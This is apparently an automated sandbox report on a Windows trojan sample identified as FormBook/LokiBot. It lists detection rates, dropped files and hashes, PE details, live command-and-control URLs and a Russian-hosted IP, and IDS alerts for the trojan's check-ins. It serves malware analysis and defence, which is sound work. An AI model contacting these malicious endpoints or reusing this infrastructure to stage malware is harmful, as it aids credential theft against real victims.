Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Payment_copy28476450.exe	35%	ReversingLabs	Win32.Trojan.FormBook
Payment_copy28476450.exe	42%	Virustotal		Browse
Payment_copy28476450.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\wcycejenv.exe	50%	ReversingLabs	Win32.Trojan.FormBook
C:\Users\user\AppData\Local\Temp\wcycejenv.exe	23%	Virustotal		Browse
C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy)	50%	ReversingLabs	Win32.Trojan.FormBook
C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy)	23%	Virustotal		Browse

Unpacked PE Files

Source	Detection	Scanner	Label	Download
3.2.wcycejenv.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.0.Payment_copy28476450.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223491	Download File
1.2.wcycejenv.exe.610000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.Payment_copy28476450.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223491	Download File

Domains

Source	Detection	Scanner	Label	Link
sempersim.su	25%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://kbfvzoboss.bid/alien/fre.php	0%	URL Reputation	safe
http://alphastand.win/alien/fre.php	0%	URL Reputation	safe
http://alphastand.trade/alien/fre.php	0%	URL Reputation	safe
http://alphastand.top/alien/fre.php	0%	URL Reputation	safe
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://sempersim.su/gl20/fre.php	100%	Avira URL Cloud	malware
http://sempersim.su/gl20/fre.php	26%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sempersim.su	95.213.216.202	true	true	25%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://sempersim.su/gl20/fre.php	true	26%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://kbfvzoboss.bid/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.win/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.trade/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.top/alien/fre.php	true	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nsis.sf.net/NSIS_Error	Payment_copy28476450.exe	false		high
http://nsis.sf.net/NSIS_ErrorError	Payment_copy28476450.exe	false		high
http://www.ibsensoftware.com/	wcycejenv.exe, wcycejenv.exe, 00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wcycejenv.exe, 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
95.213.216.202	sempersim.su	Russian Federation		49505	SELECTELRU	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	753423
Start date and time:	2022-11-24 19:53:07 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Payment_copy28476450.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/7@55/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 99.6% (good quality ratio 96%) Quality average: 86.2% Quality standard deviation: 25%
HCA Information:	Successful, ratio: 100% Number of executed functions: 75 Number of non-executed functions: 142
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:54:17	API Interceptor	52x Sleep call for process: wcycejenv.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
95.213.216.202	Order 00221.exe	Get hash	malicious	Browse	sempersim.su/gm9/fre.php
95.213.216.202	NEW_ORDER_PO137810205.pdf.exe	Get hash	malicious	Browse	sempersim.su/gm1/fre.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
sempersim.su	Order 00221.exe	Get hash	malicious	Browse	95.213.216.202
	NEW_ORDER_PO137810205.pdf.exe	Get hash	malicious	Browse	95.213.216.202
	Shipping Documents.xls	Get hash	malicious	Browse	35.197.103.140
	Payment advice.xls	Get hash	malicious	Browse	35.197.103.140
	Shipping Documents.xls	Get hash	malicious	Browse	35.197.103.140
	factura y datos bancarios.xls	Get hash	malicious	Browse	35.197.103.140
	YW4aU82yoO.exe	Get hash	malicious	Browse	35.197.103.140
	TCK5SERvv0.exe	Get hash	malicious	Browse	35.197.103.140
	Proforma-BL # 0008 Lidl Stiftung.exe	Get hash	malicious	Browse	35.197.103.140
	file.exe	Get hash	malicious	Browse	35.197.103.140
	file.exe	Get hash	malicious	Browse	35.197.103.140
	Swift_copy29850372950.exe	Get hash	malicious	Browse	35.197.103.140
	SecuriteInfo.com.Trojan.Packed2.44597.13100.10553.exe	Get hash	malicious	Browse	35.197.103.140
	Important Information on DHL 2023 Price Update.exe	Get hash	malicious	Browse	35.197.103.140
	SRNQ18pSff.exe	Get hash	malicious	Browse	35.197.103.140
	pDWNwNZTSB.exe	Get hash	malicious	Browse	35.197.103.140
	DQ8DB2RUFF.exe	Get hash	malicious	Browse	35.197.103.140
	jmdUtvQnP7.exe	Get hash	malicious	Browse	35.197.103.140
	tPGMMbZAvB.exe	Get hash	malicious	Browse	35.197.103.140
	shipping documents.xls	Get hash	malicious	Browse	35.197.103.140

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
SELECTELRU	Order 00221.exe	Get hash	malicious	Browse	95.213.216.202
	NEW_ORDER_PO137810205.pdf.exe	Get hash	malicious	Browse	95.213.216.202
	iuMUNta7xn.exe	Get hash	malicious	Browse	95.213.145.101
	SHIPPINGDOC_014_pdf.exe	Get hash	malicious	Browse	95.213.216.247
	re11Yukwra.exe	Get hash	malicious	Browse	176.113.115.153
	ChengyiSOATianjin000234pdf.exe	Get hash	malicious	Browse	95.213.216.247
	G4NjGkEzIn.exe	Get hash	malicious	Browse	95.213.216.247
	Shipping_Doc_GMLKMNL2211003.pdf.exe	Get hash	malicious	Browse	95.213.216.247
	Salary_Increase_Datasheet_October_2022.html	Get hash	malicious	Browse	92.53.68.16
	https://hjwe9.app.link/ByCtkqpnVub	Get hash	malicious	Browse	95.213.224.24
	ePAY-Advice Notification Rf.[UC7749879100].exe	Get hash	malicious	Browse	95.213.216.247
	https://hjwe9.app.link/ByCtkqpnVub	Get hash	malicious	Browse	95.213.224.24
	Request For Quotation.exe	Get hash	malicious	Browse	95.213.216.247
	https://hjwe9.app.link/ByCtkqpnVub	Get hash	malicious	Browse	95.213.224.24
	J0T3bY1SjM.exe	Get hash	malicious	Browse	95.213.216.247
	DHL Factura comercial.xls	Get hash	malicious	Browse	95.213.216.247
	SALES COMFIRMATION ORD00015112022Salewa.exe	Get hash	malicious	Browse	95.213.216.247
	DHL Factura comercial.exe	Get hash	malicious	Browse	95.213.216.247
	SecuriteInfo.com.Trojan.Packed2.42633.23276.22895.exe	Get hash	malicious	Browse	95.213.216.247
	file.exe	Get hash	malicious	Browse	176.113.115.217

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsg6B4D.tmp

Download File

Process:	C:\Users\user\Desktop\Payment_copy28476450.exe
File Type:	data
Category:	dropped
Size (bytes):	459450
Entropy (8bit):	7.057848521690541
Encrypted:	false
SSDEEP:	12288:JxcTxTkKZ9roe9deAwRxFMCgRlXXLRLh7mgb1xuuu9toBdmqQGMZRUuJ5:ATxTkQEweAwbqD7vb1xuuu9Edmdl
MD5:	DAEA903CE6FBB92BF4BE14AEC7489613
SHA1:	21872C93628D5B4715A9876332090C3D0EE03E66
SHA-256:	97CE6EB441A34EBEE7864B4B0E99939D7D773AC7FC416B27F1F72413061944B3
SHA-512:	9D6B3DAEC38C534A73F91BD26D71D77E3FAD8A21CED7817D9A9CDC5F991503AE348B728D6D9E1257D2D85B9137D33E59D2592EE1E9CABD920BB64FFE8F88D3D5
Malicious:	false
Reputation:	low
Preview:	........,...................N...d...........................................................................................................................................................................................................................................................J...............Y...j...............................................................................................................................l.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ntwcyphb.r

Download File

Process:	C:\Users\user\Desktop\Payment_copy28476450.exe
File Type:	data
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	7.955523846750811
Encrypted:	false
SSDEEP:	3072:wjajJkiH9OPjfkivvicRevZjOqhaMItCzjriqZTa5apaaaaaaaaaaaaaaaaaaaal:Q7fk2evZCqhadZqZ1
MD5:	B12381A247D8454C152B69D13B35EC05
SHA1:	347BDD9D8F6E96C6912DC56198BD5038969C41AC
SHA-256:	1B9C40C7751E34B3A3DD0658B3F1DAC5AA39D85D50D3F02CDAA555220228193E
SHA-512:	AD79AC16823D14CD07EF1C74C2933B3D1FB15D4C1F22416FCBC0F25E6C087E8C5F3BBD63E393D9B07DCAD185A51D3457F818C56B95CAD074365D8B2CA11D64D8
Malicious:	false
Reputation:	low
Preview:	....{T(...\|Y..<.(ak.5....C..."... .I4......~.......-..xN..z.....B.....3O.....'...U6..0%.]..9.[QPN.........{..u!...G..........P..WX...{.Z~.Fr.....>Zx.........[6... ?q.e.4..d.k....X.1..F....."u.U..(v.....:l.jy~...Z.h...+...M........d.F...x.]@6jc#.b.c..-T.....Y1y.<...ak.5.....C...".1. .Q4....@~.Z.....-..x..4z.....Be.K.D...N...`c.u..x.v.n....Y..9u.9..xub.{c.s..R................cL.......G.z..w..\1^.....\|...g..d.q...5-.....M(:.....M.B....xj.z.....X.p....3....lI..x..QH..U-.....B..x....\>c..b.c...T(...\|Y.h.\.V...5..U..C..."6.. ..4......~.......-p{.}N;z.I..Bn.K.B...}M\|..Ic....x........{..z.9u...xu....,s..:...............QcL.......G.z..w..\1^.....\|...g..d.q...5-.....M(:.....M.B....xj.:.N..X.p....3....lI..x..QH..........F.xD..{.>c#.b.c...T(...\|Y1h.<.(ak.5.~...C..."... .I4......~.......-..xN.4z.....B..K.D...N\|..Ic....x...n....Y..z.9u.9..xub...,s.R................cL.......G.z..w..\1^.....\|...g..d.q...5-.....M(:.....M.B....xj.:.N..X.p....3....lI..x..QH

C:\Users\user\AppData\Local\Temp\stvrrcrc.d

Download File

Process:	C:\Users\user\Desktop\Payment_copy28476450.exe
File Type:	data
Category:	dropped
Size (bytes):	5655
Entropy (8bit):	6.234833362351721
Encrypted:	false
SSDEEP:	96:4HXF/taUEVYCVmNFHILHl95DTMQUTPENeG2O3VyKbaj9XPlP:w1/tNECRKZTtkG2W8fP
MD5:	8C23AB33C072F31910D8126FE29420D7
SHA1:	19752AC35C502F4CD5BB55D3DB4ACE8FD00C0767
SHA-256:	0C6033793464A7C0D79F2A402CC4DCF821B8C633371B4D676BA18F21FCB3376F
SHA-512:	612E97ABC1D02F74E9334D2D37A0193C974D6BEFB86E3A578AC2BE71AA6B56331F3F24F69EC9953B525AAD39EFE6376563C8BDAFAA552A936582613BDBCC7099
Malicious:	false
Reputation:	low
Preview:	.*.<<`.,<<<.\|..\|..<.<.\|.K...`.,<<<...\|..t....q..~,.=<<..pr.>c.q.;....$...J.<.....q...+<<...2M.....sD.W.M..F.J..q....J.<....`.,<<<.\|..\|..<.<.\|.d.X.....<<<..p.....R..L.T..+..EK;.EK...........p....Zp...y...p..L.:.....=q....J.<.........y.;...8..4t.O..\..._.. .g.\|..W...........p...O......c..p.....cq.z.;....EJ.<......l...O..........`.,<<<.\|..\|..<.<.\|.dp.^...q....y..T.....[.q....[c.qR.a.<..[..p.....O......4....JR........\....J.nc2...R......\.LncV.K..Lnc_q..y.....O...y........cT...z.;..;.\|...EJ.<.....q...+<<...2M.....~.sD.W.M..F.J..q....J.<....<<O..=<<<.....HN..cN..)N..N..zN..{.aT<.a.<Rv.n...Rp.n...R..n...Rk.n...Ru.n...Rl.n...Rd.n...Rj.n...R6.n...Rz.n..J;.n..@........dn.^..q.........d+>..q.........d.z...q..r......dY....q.."......d\|...q.........d..^..q........d.....q..2......dt....q.........;.\|S.<N...;.\|..<N...;.\|M.N...);.\|S..N....;.\|...N...}..T..H.a.<....\|....y..{ ...;ZR......H..........;D.......W;.\|S.<.....;E}SE<....c.qn;.\|..<.....;E}..<....c.q.;.\|M......;E}M.....

C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Download File

Process:	C:\Users\user\Desktop\Payment_copy28476450.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	340992
Entropy (8bit):	6.549726242729774
Encrypted:	false
SSDEEP:	6144:Qoe9deNmwPG6xFMCgRlXXLRLh7mzMb1iRWuuu9toDVdmqQL17EMRvM/gRUuJ5dX:Qoe9deAwRxFMCgRlXXLRLh7mgb1xuuuz
MD5:	3182BEF520A1E9F52BE3755C25E4C3B0
SHA1:	1829DD90A63BF67DCEB3F6CC41C8AACE8E7E31AD
SHA-256:	E7ECA366A9467420BA42645AAC451E02D0F009C6F6DFE3A47349510DE0BBFB96
SHA-512:	BDC8E908D5BCDD52CCF880D11D863D76EE28D9201C51972CD547E94887E32BA986329D5C7615FBB1F01E8E2AF5123E419A411DFAADD8B9B5A2D8E586C947E962
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50% Antivirus: Virustotal, Detection: 23%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......i.).-.G.-.G.-.G.v.D.'.G.v.B...G.v.C.?.G...../.G...B...G...C.>.G...D.8.G.v.F.4.G.-.F...G...C.,.G.....,.G...E.,.G.Rich-.G.........PE..L.....~c...............!.x...........z............@..........................P..............................................D........@..............................................................0...@............................................text....v.......x.................. ..`.rdata..............\|..............@..@.data........0......................@....rsrc........@.......2..............@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\wcycejenv.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	340992
Entropy (8bit):	6.549726242729774
Encrypted:	false
SSDEEP:	6144:Qoe9deNmwPG6xFMCgRlXXLRLh7mzMb1iRWuuu9toDVdmqQL17EMRvM/gRUuJ5dX:Qoe9deAwRxFMCgRlXXLRLh7mgb1xuuuz
MD5:	3182BEF520A1E9F52BE3755C25E4C3B0
SHA1:	1829DD90A63BF67DCEB3F6CC41C8AACE8E7E31AD
SHA-256:	E7ECA366A9467420BA42645AAC451E02D0F009C6F6DFE3A47349510DE0BBFB96
SHA-512:	BDC8E908D5BCDD52CCF880D11D863D76EE28D9201C51972CD547E94887E32BA986329D5C7615FBB1F01E8E2AF5123E419A411DFAADD8B9B5A2D8E586C947E962
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50% Antivirus: Virustotal, Detection: 23%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......i.).-.G.-.G.-.G.v.D.'.G.v.B...G.v.C.?.G...../.G...B...G...C.>.G...D.8.G.v.F.4.G.-.F...G...C.,.G.....,.G...E.,.G.Rich-.G.........PE..L.....~c...............!.x...........z............@..........................P..............................................D........@..............................................................0...@............................................text....v.......x.................. ..`.rdata..............\|..............@..@.data........0......................@....rsrc........@.......2..............@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck

Download File

Process:	C:\Users\user\AppData\Local\Temp\wcycejenv.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\21c8026919fd094ab07ec3c180a9f210_d06ed635-68f6-4e9a-955c-4899f5f57b9a

Download File

Process:	C:\Users\user\AppData\Local\Temp\wcycejenv.exe
File Type:	data
Category:	dropped
Size (bytes):	49
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	884BB48A55DA67B4812805CB8905277D
SHA1:	6B3D33E00F5B9DEAE2826F80644CB4F6E78B7401
SHA-256:	78877FA898F0B4C45C9C33AE941E40617AD7C8657A307DB62BC5691F92F4F60E
SHA-512:	989A38778FC961EB2C79E70621EABFB4B22D6537F08A71359B27AF495646E304EE252A523769F66B75BC2FAF546ACB22A71B358B51221174AC0D964DA7A62821
Malicious:	false
Preview:	.................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.918853891717431
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Payment_copy28476450.exe
File size:	247655
MD5:	70e90926399154c2708801a73cf53d99
SHA1:	0eaff8f1cde17a392d9e7935bae96f21c91acc3c
SHA256:	c36de6d07a8ce4407cb59a275dbf8c04d05844903bb6d566f295ccd13a2d4ce6
SHA512:	a6256e11df089a3063738ca0e36eca4ca89ed89ac7530a83394aa1864ba392e87318270529d04b1c72fa0d2cb392ba8c66ebedca335af82ec8fe124814ec9cab
SSDEEP:	6144:QBn1WN747c5LFA0rw3gw8QXRq+/lp7q76lS:gWZ4wa8QXRq+/Pe76lS
TLSH:	F434126B32F09476F961057099B3A657EBFA9300455813474BC7CFBBADB06C2CE8A172
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3(..RF..RF..RF.]...RF..RG.pRF.]...RF..qv..RF..T@..RF.Rich.RF.........................PE..L...ly.V.................^.........

File Icon


Icon Hash:	b2a88c96b2ca6a72

Static PE Info

General

Entrypoint:	0x40324f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x567F796C [Sun Dec 27 05:38:52 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	ab6770b0a8635b9d92a5838920cfe770

Entrypoint Preview

Instruction
sub esp, 00000180h
push ebx
push ebp
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+1Ch], ebx
mov dword ptr [esp+14h], 00409130h
xor esi, esi
mov byte ptr [esp+18h], 00000020h
call dword ptr [004070B8h]
call dword ptr [004070B4h]
cmp ax, 00000006h
je 00007FDE449C9A73h
push ebx
call 00007FDE449CC861h
cmp eax, ebx
je 00007FDE449C9A69h
push 00000C00h
call eax
push 004091E0h
call 00007FDE449CC7E2h
push 004091D8h
call 00007FDE449CC7D8h
push 004091CCh
call 00007FDE449CC7CEh
push 0000000Dh
call 00007FDE449CC831h
push 0000000Bh
call 00007FDE449CC82Ah
mov dword ptr [00423F84h], eax
call dword ptr [00407034h]
push ebx
call dword ptr [00407270h]
mov dword ptr [00424038h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 00000160h
push eax
push ebx
push 0041F538h
call dword ptr [00407160h]
push 004091C0h
push 00423780h
call 00007FDE449CC461h
call dword ptr [004070B0h]
mov ebp, 0042A000h
push eax
push ebp
call 00007FDE449CC44Fh
push ebx
call dword ptr [00407144h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x73cc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2d000	0x9e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x280	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5c4a	0x5e00	False	0.659906914893617	data	6.410763775060762	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x115e	0x1200	False	0.4466145833333333	data	5.142548180775325	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1b078	0x600	False	0.455078125	data	4.2252195571372315	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x25000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2d000	0x9e0	0xa00	False	0.45625	data	4.509328731926377	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x2d190	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States
RT_DIALOG	0x2d478	0x100	data	English	United States
RT_DIALOG	0x2d578	0x11c	data	English	United States
RT_DIALOG	0x2d698	0x60	data	English	United States
RT_GROUP_ICON	0x2d6f8	0x14	data	English	United States
RT_MANIFEST	0x2d710	0x2cc	XML 1.0 document, ASCII text, with very long lines (716), with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	SetFileAttributesA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CompareFileTime, SearchPathA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, CreateDirectoryA, lstrcmpiA, GetTempPathA, GetCommandLineA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, LoadLibraryA, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, WaitForSingleObject, ExitProcess, GetWindowsDirectoryA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, LoadLibraryExA, GetModuleHandleA, MultiByteToWideChar, FreeLibrary
USER32.dll	GetWindowRect, EnableMenuItem, GetSystemMenu, ScreenToClient, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, PostQuitMessage, RegisterClassA, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, OpenClipboard, TrackPopupMenu, SendMessageTimeoutA, GetDC, LoadImageA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, SetWindowLongA, EmptyClipboard, SetTimer, CreateDialogParamA, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.695.213.216.20249737802025381 11/24/22-19:55:31.199874	TCP	2025381	ET TROJAN LokiBot Checkin	49737	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249748802021641 11/24/22-19:55:53.130311	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49748	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249750802825766 11/24/22-19:55:57.329298	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49750	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249751802021641 11/24/22-19:55:59.376338	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49751	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.859881532014169 11/24/22-19:55:09.708351	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	59881	53	192.168.2.6	8.8.8.8
95.213.216.202192.168.2.680497332025483 11/24/22-19:55:24.906100	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49733	95.213.216.202	192.168.2.6
95.213.216.202192.168.2.680497352025483 11/24/22-19:55:28.867256	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49735	95.213.216.202	192.168.2.6
192.168.2.695.213.216.20249736802024318 11/24/22-19:55:29.163584	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49736	80	192.168.2.6	95.213.216.202
95.213.216.202192.168.2.680497372025483 11/24/22-19:55:32.908191	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49737	95.213.216.202	192.168.2.6
95.213.216.202192.168.2.680497392025483 11/24/22-19:55:36.924861	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49739	95.213.216.202	192.168.2.6
192.168.2.695.213.216.20249754802024318 11/24/22-19:56:04.818902	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49754	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249736802024313 11/24/22-19:55:29.163584	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49736	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.856122532014169 11/24/22-19:54:54.866804	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	56122	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249754802024313 11/24/22-19:56:04.818902	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49754	80	192.168.2.6	95.213.216.202
